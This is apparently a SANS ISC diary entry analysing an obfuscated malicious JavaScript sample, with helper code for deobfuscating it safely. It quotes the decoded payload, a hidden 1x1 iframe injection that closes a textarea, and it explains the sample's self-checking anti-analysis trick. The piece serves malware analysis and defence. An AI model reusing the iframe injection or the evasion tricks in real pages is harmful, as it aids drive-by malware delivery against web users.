JavaScript traps for analysts
On Friday, Lorna posted a diary (http://isc.sans.org/diary.html?storyid=2325) about some malware we received that day. A compromised site hosted an obfuscated JavaScript program – a typical scenario you might say.
Over the weekend I received a couple of e-mails from our readers asking how to deobfuscate that JavaScript, so I spent more time analyzing it. I found some very interesting details and traps that are almost directly related to the nice diary Daniel posted a couple of weeks ago (http://isc.sans.org/diary.html?storyid=2268).
If you haven’t read Daniel’s diary I recommend you definitely do so. Daniel showed 4 typical methods that you can use when analyzing obfuscated JavaScript programs. As you will see, of those 4 methods, 3 will fail on this example!
The JavaScript file that we will analyze is nicely obfuscated, as you can see below:
As in most similar obfuscation attempts, a function is defined first, called OAEC86 (as you will see, absolutely all variables have similar names, which makes them more difficult for a human to read). At the end, that function is called with a big string as the input parameter (the obfuscated content).
Replacing document.write() with alert()
So, we have to analyze what the OAEC86 function does. As you can see in the screenshot above, the function ends with a call to document.write(), which causes your browser to execute the (deobfuscated) code. If you approach this with method 1 from Daniel’s diary (replace document.write() calls with alert()) and start the JavaScript program, your browser will appear to hang and you will have to kill it with Task Manager. We will see later why that happens, but let’s analyze the function itself first.
As the code has been stripped of spaces, it’s difficult to analyze, so I added some spaces and tabs to make it more readable. There is one interesting variable that gets declared right at the beginning of the function:
var A112FA=arguments.callee.toString().replace(/\W/g,"").toUpperCase();
When I saw this I immediately remembered another diary I wrote some time ago (http://isc.sans.org/diary.html?storyid=1519), in which I analyzed a similar trick, but this one goes a bit further.
So, the variable above gets its content from the arguments.callee.toString() call. This call returns a text string which contains the whole source of the function being executed, from the first line to the last one. One thing I found before was that there is a big difference between Internet Explorer and Mozilla in the handling of white space. However, as you can see in the example above, that doesn’t matter here: all non-word characters (\W, which includes white space) are stripped out with the replace() call and the result is then converted to upper case. It’s nice to see how attackers fixed this so it works correctly (from their point of view) in both IE and Mozilla.
So, after executing this call, the variable A112FA will contain the following string: “FUNCTIONOAEC86T1F0AVARA112FA…”. You can see the beginning part of the code here.
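To make the effect of that normalisation concrete, here is a minimal sketch. The three small functions are hypothetical stand-ins, not code from the sample, and the helper calls toString() on a function reference instead of using arguments.callee so that it also runs where strict mode is enforced. It shows that reformatting a function leaves the normalised string unchanged, while editing an identifier does not.

```javascript
// Normalise a function's source the way the sample does:
// drop every non-word character, then upper-case what is left.
function normalizedSource(fn) {
  return fn.toString().replace(/\W/g, "").toUpperCase();
}

// Hypothetical function written without any spacing.
var compact = function (x) {var y=x+1;return y;};

// The same function after an analyst adds spaces and line breaks.
var spaced = function (x) {
    var y = x + 1;

    return y;
};

// Same layout as `compact`, but one identifier was changed.
var edited = function (x) {var z=x+1;return z;};

var sameDespiteWhitespace = normalizedSource(compact) === normalizedSource(spaced);
var differsAfterEdit = normalizedSource(compact) !== normalizedSource(edited);

console.log(sameDespiteWhitespace, differsAfterEdit); // prints: true true
```

This is why pretty-printing the sample is harmless, whereas touching any word character inside the function is not.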
As you can probably guess at this point, the function actually uses its own source to deobfuscate the content. This way the author made sure that you cannot change the function without breaking the deobfuscation. However, this still doesn’t explain why the browser hangs when you change the document.write() call to alert(). The answer lies further down.
Without analyzing every line of the code (that’s left as an exercise for you, if you are interested in this area), I’ll just explain why the browser hangs.
The big for loop in the code performs various permutations which deobfuscate the content. There is a while() loop in the code as well, which keeps looping as long as the Q3A988 variable is different from zero. Now, when you change the document.write() call to alert(), the function’s own text changes, and with it the A112FA string that the calculations depend on. As a result Q3A988 never reaches zero, the while() loop keeps looping, and your browser hangs.
So the first method from the original diary is a no-go here. Let’s try the second method.
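The dependency between the function's text and its output can be shown with a toy decoder. This is only a sketch under stated assumptions: the checksum-and-XOR scheme, buildDecoder, keyOf and the fake document and alert objects are all invented for illustration and are not the sample's real algorithm. In the real sample the corrupted state feeds a while() loop that never ends; the toy simply produces wrong output instead of hanging.

```javascript
// Build a decoder whose key is a checksum of its own normalised source.
// `sinkCall` is the text of the final output call, so both variants are
// identical except for that one call.
function buildDecoder(sinkCall) {
  var body =
    'var src = arguments.callee.toString().replace(/\\W/g, "").toUpperCase();' +
    'var key = 0;' +
    'for (var i = 0; i < src.length; i++) { key = (key + src.charCodeAt(i)) % 256; }' +
    'var out = "";' +
    'for (var j = 0; j < data.length; j++) { out += String.fromCharCode(data[j] ^ key); }' +
    sinkCall + '(out);';
  // document and alert are passed in as parameters so no browser is needed.
  return new Function("data", "document", "alert", body);
}

// The same checksum, computed from outside, so we can encode test data.
function keyOf(fn) {
  var src = fn.toString().replace(/\W/g, "").toUpperCase();
  var key = 0;
  for (var i = 0; i < src.length; i++) { key = (key + src.charCodeAt(i)) % 256; }
  return key;
}

var original = buildDecoder("document.write"); // untouched decoder
var edited = buildDecoder("alert");            // analyst's "method 1" edit

// Encode a harmless string with the key of the ORIGINAL decoder.
var plaintext = "decoded payload";
var originalKey = keyOf(original);
var data = plaintext.split("").map(function (c) {
  return c.charCodeAt(0) ^ originalKey;
});

// Capture whatever each variant outputs.
var captured = [];
var fakeDocument = { write: function (s) { captured.push(s); } };
var fakeAlert = function (s) { captured.push(s); };

original(data, fakeDocument, fakeAlert);
edited(data, fakeDocument, fakeAlert);

console.log(captured[0] === plaintext); // original decodes correctly
console.log(captured[1] === plaintext); // edited variant derives another key
```

The only difference between the two decoders is the name of the output call, yet that is enough to change the derived key and therefore everything computed from it.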
Beware of </textarea>
Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope you are aware that whenever you run code like this you should do it in an isolated environment, because you are running live, potentially malicious code. This is even more important in this case.
I’ll skip right to the point – when this program is deobfuscated, the result will be this:
</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>
What does this do? It closes the <textarea> tag that you might have put before it. In other words, if you were running this in your browser and you used method 2, the <iframe> would land outside your text area and you would actually execute the malicious code! It is obvious that the author of this code came prepared for analysts!
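The breakout is easy to see with plain string handling. The sketch below uses the deobfuscated output quoted above; wrapNaive, escapeHtml and wrapEscaped are hypothetical helpers, and escaping the output before display is my assumption of one possible defence, not something taken from Daniel’s diary. Keep in mind that any such wrapper still has to be introduced without changing the text of the malicious function, or the self-check described earlier breaks the decoding.

```javascript
// Deobfuscated output as quoted in the diary (URL already redacted there).
var payload = '</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>';

// Naive wrapping: the payload's own </textarea> closes the analyst's tag.
function wrapNaive(html) {
  return "<textarea rows=50 cols=50>" + html + "</textarea>";
}

// Hypothetical safer variant: escape markup characters before wrapping,
// so nothing in the payload can be parsed as a tag.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

function wrapEscaped(html) {
  return "<textarea rows=50 cols=50>" + escapeHtml(html) + "</textarea>";
}

var naive = wrapNaive(payload);
var escaped = wrapEscaped(payload);

// Everything after the first closing tag is live markup for the browser.
var closeTag = "</textarea>";
var liveMarkup = naive.slice(naive.indexOf(closeTag) + closeTag.length);

console.log(liveMarkup.indexOf("<iframe") === 0); // true: the iframe escaped the textarea
console.log(escaped.indexOf("<iframe") === -1);   // true: no raw iframe tag remains
```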
Next, method 3. In this case it isn’t really applicable, as the deobfuscation code is way too complex to be rewritten in Perl (if you really do it, let me know).
So what are we left with? Method 4, or (my favourite), a debugger.
Defeating the obfuscation
One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone program. It will not work out of the box, though, as a standalone JavaScript engine has no document object and will not know what to do with document.write(). Folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/blog/blog.php?BlogID=98; it’s a nice read that I definitely recommend.
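The general idea of supplying the missing object can be sketched as follows. This is not the Websense code, which I am not reproducing here; it is a hypothetical stand-in document object, with the names captured and emit invented for the example, meant to be loaded in a standalone engine before the sample. Because the sample's function text stays untouched, its self-check is not affected.

```javascript
// Collected output, so it can be inspected after the script has run.
var captured = [];

// Pick an output routine: console.log where available, otherwise the
// print() function that standalone shells traditionally provide.
var emit = (typeof console !== "undefined")
  ? function (s) { console.log(s); }
  : print;

// Hypothetical stand-in for the browser's document object.
var document = {
  write: function (html) {
    captured.push(String(html));
    emit("[document.write] " + html);
  },
  writeln: function (html) {
    this.write(html + "\n");
  }
};

// Stand-in for the unmodified sample: it still calls document.write().
(function () {
  document.write("<b>decoded output would appear here</b>");
})();
```

Run this only in a standalone engine inside an isolated environment; in a real browser the name document is already taken.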
I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript engine written in Java, and it comes with a JavaScript debugger. The debugger has a nice GUI and, being written in Java, it will work on any platform. You just have to make sure that you have a JRE installed.
A lot of users have problems starting it. You have to make sure that your Java classpath points to the js.jar file that comes with Rhino, otherwise Java will not be able to find the class it needs. In the example below, I’ve extracted Rhino into the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in D:\malware.js. Rhino should be started with the following command:
D:\> java -classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js
This will open a nice GUI window that is pretty much self-explanatory. I advise making the code human readable before this, as that will let you set breakpoints more easily. As we’ve seen, in this case you can do that safely, because the deobfuscation function strips out white space from its own text anyway.
You can now either step through the program, debug it and see how it works, or simply set a breakpoint on the document.write() call and then inspect the I4D790 variable, as shown below:
You can see that it contains the code that would have been executed in the browser.
As we saw, malware authors are definitely improving their work and are, almost certainly, aware of the methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it served no other purpose in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.
UPDATE
A couple of updates with good stuff we’ve received from our readers:
1) Peter wrote to correct me regarding Tom Liston’s textarea method. This method also modifies the function (by adding <textarea> and </textarea> tags before and after the document.write() function call), so it will also fail because of the endless while() loop. This is not directly related to the fact that the attackers close the <textarea> tag, but see 2).
2) Aaron sent us a nice function he uses to deobfuscate stuff. Basically, he replaces the document.write() call with a call to a function he defines, called documentwrite. The function looks like this:
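function documentwrite(txt){
    // Defuse the first remaining "textarea" so the output cannot close our tag.
    var txt0 = txt.replace("textarea", "apple");
    if (txt == txt0) {
        // Nothing left to replace: show the text inside a textarea.
        document.write("<textarea rows=50 cols=50>");
        document.write(txt0);
        document.write("</textarea>");
    }
    else {
        // One occurrence was replaced; recurse until none remain.
        documentwrite(txt0);
    }
}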
So he makes sure that the output will go into a textarea, even if it contains </textarea> tags. In this case it might even work: the only change to the malicious function is the removal of the . from document.write(), and the . is a non-word character that is stripped out anyway, so this will pass the self-check this malware implements.
3) An anonymous reader wrote to say that there might be some dependencies/problems with running Rhino on Linux, due to its Java implementation. Also, according to this reader, on Linux the classpath parameter is passed as "--classpath".
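The reason Aaron’s rename in update 2 survives the self-check can be verified with a few lines. In this sketch the call text document.write(I4D790) is an assumption about how the sample's final statement looks, and normalize and neutralize are hypothetical helper names. The last helper is my own variation, not Aaron’s code: it replaces every occurrence in one pass and ignores case, since HTML tag names are case-insensitive and a payload could use </TEXTAREA>.

```javascript
// The same normalisation the sample applies to its own source text.
function normalize(source) {
  return source.replace(/\W/g, "").toUpperCase();
}

// Assumed form of the final call, plus the two analyst edits discussed.
var originalCall = "document.write(I4D790);";
var renamedCall = "documentwrite(I4D790);";
var alertCall = "alert(I4D790);";

// Dropping the dot removes only a non-word character, so nothing changes.
var renamePasses = normalize(originalCall) === normalize(renamedCall);
// Switching to alert() changes word characters, so the text differs.
var alertPasses = normalize(originalCall) === normalize(alertCall);

console.log(renamePasses, alertPasses); // prints: true false

// Variation on the replacement step: global and case-insensitive.
function neutralize(txt) {
  return String(txt).replace(/textarea/gi, "apple");
}

console.log(neutralize("</TEXTAREA></textarea>")); // prints: </apple></apple>
```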
Thanks to all for your contributions.
Bojan